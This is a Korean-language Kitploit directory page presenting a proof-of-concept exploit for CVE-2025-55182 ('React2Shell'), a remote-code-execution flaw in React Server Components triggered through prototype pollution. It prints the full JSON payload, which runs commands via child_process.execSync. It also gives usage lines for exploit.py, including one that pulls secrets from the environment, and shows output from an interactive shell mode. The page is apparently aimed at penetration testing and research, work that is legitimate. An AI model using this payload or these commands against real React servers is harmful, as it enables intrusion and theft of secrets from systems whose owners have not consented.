Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
EXPLOIT-CVE-2025-55182 — CVE-2025-55182 (React2Shell)에 대한 개념 증명 익스플로잇으로, 프로토타입 오염을 통해 React 서버 컴포넌트의 치명적인 RCE 취약점을 악용합니다. 대화형 및 명령줄 기반 공격 모드를 포함합니다. | Kitploit
도구/GitHubGitHub/joaovicdev/exploit-cve-2025-55182
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed TeamingPayload Development
GitHubjoaovicdev/exploit-cve-2025-55182

EXPLOIT-CVE-2025-55182

CVE-2025-55182 (React2Shell)에 대한 개념 증명 익스플로잇으로, 프로토타입 오염을 통해 React 서버 컴포넌트의 치명적인 RCE 취약점을 악용합니다. 대화형 및 명령줄 기반 공격 모드를 포함합니다.

저장소 보기
5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 개념 증명

CVE-2025-55182 React

개요

**CVE-2025-55182 (React2Shell)**에 대한 실용적인 데모 - React Server Components의 치명적인 RCE 취약점입니다.

취약점 세부 사항

  • CVE 식별자: CVE-2025-55182
  • 유형: 프로토타입 오염을 통한 원격 코드 실행
  • CVSS: 9.8 (치명적)
  • 영향받는 버전: React 19.0.0, 19.1.0, 19.1.1, 19.2.0

공격 벡터

React Server Components는 FormData를 안전하지 않게 역직렬화합니다. 특별히 조작된 multipart 필드가 프로토타입 오염을 유발하고 child_process.execSync를 통해 임의 코드를 실행합니다.


빠른 설정

root@kitploit:~
npm install
pip3 install requests
npm run dev

애플리케이션 실행 주소: http://localhost:3000


익스플로잇

기본 사용법

root@kitploit:~
python3 exploit.py -c "whoami"

명령 예제

root@kitploit:~
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"

대화형 모드

root@kitploit:~
python3 exploit.py -i
root@kitploit:~
> whoami
명령 결과:
your-username
============================================================

> pwd
명령 결과:
/path/to/project
============================================================

> exit

작동 원리

페이로드 구조

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

테스트

터미널 1: 서버 시작

root@kitploit:~
npm run dev

터미널 2: 익스플로잇 실행

root@kitploit:~
python3 exploit.py -c "whoami"

상세 모드

root@kitploit:~
python3 exploit.py -c "whoami" -v

전체 페이로드 구조와 서버 응답을 보여줍니다.


참고 자료

  • CVE-2025-55182 - NVD
  • React Security
  • OWASP Deserialization

By Guaxinim | 사이버 보안 연구

도구 다운로드